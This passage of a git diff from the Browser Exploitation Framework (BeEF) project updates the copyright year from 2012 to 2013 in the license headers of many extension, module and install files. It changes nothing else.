diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
index 99541bc6b..9fe810435 100644
--- a/extensions/ipec/models/ipec_exploits_run.rb
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
index 7f87e5cae..9f5bcddaa 100644
--- a/extensions/ipec/rest/ipec.rb
+++ b/extensions/ipec/rest/ipec.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/metasploit/api.rb b/extensions/metasploit/api.rb
index 245a8563e..644adf6af 100644
--- a/extensions/metasploit/api.rb
+++ b/extensions/metasploit/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 29bfebb8c..41f9f406b 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb
index 3ea6db50d..f123ebfd5 100644
--- a/extensions/metasploit/extension.rb
+++ b/extensions/metasploit/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/metasploit/module.rb b/extensions/metasploit/module.rb
index 55a371640..d64b9dd27 100644
--- a/extensions/metasploit/module.rb
+++ b/extensions/metasploit/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
index 9affbfa5d..7b7eacd25 100644
--- a/extensions/metasploit/rpcclient.rb
+++ b/extensions/metasploit/rpcclient.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/notifications/channels/email.rb b/extensions/notifications/channels/email.rb
index 3ab2b06e0..e15d4dce7 100644
--- a/extensions/notifications/channels/email.rb
+++ b/extensions/notifications/channels/email.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/notifications/channels/tweet.rb b/extensions/notifications/channels/tweet.rb
index a3a1828aa..b436d840d 100644
--- a/extensions/notifications/channels/tweet.rb
+++ b/extensions/notifications/channels/tweet.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/notifications/config.yaml b/extensions/notifications/config.yaml
index 2a32bff44..4bf8bbc59 100644
--- a/extensions/notifications/config.yaml
+++ b/extensions/notifications/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/notifications/extension.rb b/extensions/notifications/extension.rb
index d7feac539..118d54d45 100644
--- a/extensions/notifications/extension.rb
+++ b/extensions/notifications/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/notifications/notifications.rb b/extensions/notifications/notifications.rb
index 6ae72817f..0e8344d6a 100644
--- a/extensions/notifications/notifications.rb
+++ b/extensions/notifications/notifications.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/proxy/api.rb b/extensions/proxy/api.rb
index 6b921a8ac..896a5f41e 100644
--- a/extensions/proxy/api.rb
+++ b/extensions/proxy/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/proxy/config.yaml b/extensions/proxy/config.yaml
index 446f010a6..41a8dc1af 100644
--- a/extensions/proxy/config.yaml
+++ b/extensions/proxy/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/proxy/controllers/proxy.rb b/extensions/proxy/controllers/proxy.rb
index 8614ffe79..8c39d6c42 100644
--- a/extensions/proxy/controllers/proxy.rb
+++ b/extensions/proxy/controllers/proxy.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/proxy/extension.rb b/extensions/proxy/extension.rb
index fb6866963..680ed9d6c 100644
--- a/extensions/proxy/extension.rb
+++ b/extensions/proxy/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/proxy/proxy.rb b/extensions/proxy/proxy.rb
index 4f6dfacb1..bc6393c43 100644
--- a/extensions/proxy/proxy.rb
+++ b/extensions/proxy/proxy.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/qrcode/config.yaml b/extensions/qrcode/config.yaml
index adfea35ba..1672ca42b 100644
--- a/extensions/qrcode/config.yaml
+++ b/extensions/qrcode/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/qrcode/extension.rb b/extensions/qrcode/extension.rb
index 56fe35bc0..b84f1eb3a 100644
--- a/extensions/qrcode/extension.rb
+++ b/extensions/qrcode/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/qrcode/qrcode.rb b/extensions/qrcode/qrcode.rb
index aa2f44952..ed7587529 100644
--- a/extensions/qrcode/qrcode.rb
+++ b/extensions/qrcode/qrcode.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/api.rb b/extensions/requester/api.rb
index c848e4f40..98477d190 100644
--- a/extensions/requester/api.rb
+++ b/extensions/requester/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/api/hook.rb b/extensions/requester/api/hook.rb
index f9377d82a..82e379b6e 100644
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -32,7 +32,7 @@ module BeEF
             #todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
               content = File.read(find_beefjs_component_path 'beef.net.requester').gsub('//
-              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              //   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
               //   Browser Exploitation Framework (BeEF) - http://beefproject.com
               //   See the file \'doc/COPYING\' for copying permission
               //', "")
diff --git a/extensions/requester/config.yaml b/extensions/requester/config.yaml
index 6836b2ef6..1dbdd6214 100644
--- a/extensions/requester/config.yaml
+++ b/extensions/requester/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/controllers/requester.rb b/extensions/requester/controllers/requester.rb
index 4a23eb530..25bcfa016 100644
--- a/extensions/requester/controllers/requester.rb
+++ b/extensions/requester/controllers/requester.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/extension.rb b/extensions/requester/extension.rb
index e26b5c72e..5f8b2f6a4 100644
--- a/extensions/requester/extension.rb
+++ b/extensions/requester/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/handler.rb b/extensions/requester/handler.rb
index 60d579b7e..5c652d168 100644
--- a/extensions/requester/handler.rb
+++ b/extensions/requester/handler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/requester/models/http.rb b/extensions/requester/models/http.rb
index 9c4c60b55..6fb143f40 100644
--- a/extensions/requester/models/http.rb
+++ b/extensions/requester/models/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index d048e3f78..a2b03233f 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
index d272e50b0..ef92b80fb 100644
--- a/extensions/social_engineering/extension.rb
+++ b/extensions/social_engineering/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index ea0ab5a4d..c62ebf7c8 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.html b/extensions/social_engineering/mass_mailer/templates/default/mail.html
index 62b21ab63..c39fb801d 100644
--- a/extensions/social_engineering/mass_mailer/templates/default/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
index 6b27b73bf..1541aae3f 100644
--- a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
index 08599e5e4..a5e4c0cc4 100644
--- a/extensions/social_engineering/models/interceptor.rb
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb
index 64faa59aa..f29abe168 100644
--- a/extensions/social_engineering/models/mass_mailer.rb
+++ b/extensions/social_engineering/models/mass_mailer.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb
index 0e18315cb..1cbad0926 100644
--- a/extensions/social_engineering/models/web_cloner.rb
+++ b/extensions/social_engineering/models/web_cloner.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index 332eebf6c..b03447145 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 758bd3872..eca90da93 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 81854644e..9b98e3537 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb
index 2eff2b316..7a7ebbcd8 100644
--- a/extensions/xssrays/api.rb
+++ b/extensions/xssrays/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb
index ceb0b3374..7d7e54e30 100644
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -43,7 +43,7 @@ module BeEF
             # todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
               content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
-              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              //   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
               //   Browser Exploitation Framework (BeEF) - http://beefproject.com
               //   See the file \'doc/COPYING\' for copying permission
               //', "")
diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml
index 20b710e62..7fd63a847 100644
--- a/extensions/xssrays/config.yaml
+++ b/extensions/xssrays/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/controllers/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb
index d8ea2f3fe..a3805b0f6 100644
--- a/extensions/xssrays/controllers/xssrays.rb
+++ b/extensions/xssrays/controllers/xssrays.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb
index 1f2f75e40..a9ea9327d 100644
--- a/extensions/xssrays/extension.rb
+++ b/extensions/xssrays/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb
index abc6eaea4..dee21397b 100644
--- a/extensions/xssrays/handler.rb
+++ b/extensions/xssrays/handler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb
index 09993368b..8b312005e 100644
--- a/extensions/xssrays/models/xssraysdetail.rb
+++ b/extensions/xssrays/models/xssraysdetail.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb
index e055d1f29..24ded2b93 100644
--- a/extensions/xssrays/models/xssraysscan.rb
+++ b/extensions/xssrays/models/xssraysscan.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/install b/install
index a8e0cbe17..ef2831b90 100755
--- a/install
+++ b/install
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/install-beef b/install-beef
index ca5b7853a..a91892af9 100644
--- a/install-beef
+++ b/install-beef
@@ -1,6 +1,6 @@
 #!/bin/bash
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js
index 5e21d4775..bacb3f418 100644
--- a/modules/browser/browser_fingerprinting/command.js
+++ b/modules/browser/browser_fingerprinting/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml
index e5a8b5437..475be130e 100644
--- a/modules/browser/browser_fingerprinting/config.yaml
+++ b/modules/browser/browser_fingerprinting/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb
index d15b057f5..e270a3143 100644
--- a/modules/browser/browser_fingerprinting/module.rb
+++ b/modules/browser/browser_fingerprinting/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js
index 8f004e4f0..2a5e566db 100644
--- a/modules/browser/detect_default_browser/command.js
+++ b/modules/browser/detect_default_browser/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml
index 6561949fc..80655bc8b 100644
--- a/modules/browser/detect_default_browser/config.yaml
+++ b/modules/browser/detect_default_browser/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb
index 5fd5764d4..88233ad01 100644
--- a/modules/browser/detect_default_browser/module.rb
+++ b/modules/browser/detect_default_browser/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js
index bf656bc2d..df9070739 100644
--- a/modules/browser/detect_firebug/command.js
+++ b/modules/browser/detect_firebug/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml
index 10e011191..e62499339 100644
--- a/modules/browser/detect_firebug/config.yaml
+++ b/modules/browser/detect_firebug/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb
index 4a1515fc9..54e9fdafc 100644
--- a/modules/browser/detect_firebug/module.rb
+++ b/modules/browser/detect_firebug/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/detect_popup_blocker/command.js b/modules/browser/detect_popup_blocker/command.js
index cf64e2e21..c1255b646 100644
--- a/modules/browser/detect_popup_blocker/command.js
+++ b/modules/browser/detect_popup_blocker/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/detect_popup_blocker/config.yaml b/modules/browser/detect_popup_blocker/config.yaml
index c5cee313a..90f6a9cd5 100644
--- a/modules/browser/detect_popup_blocker/config.yaml
+++ b/modules/browser/detect_popup_blocker/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
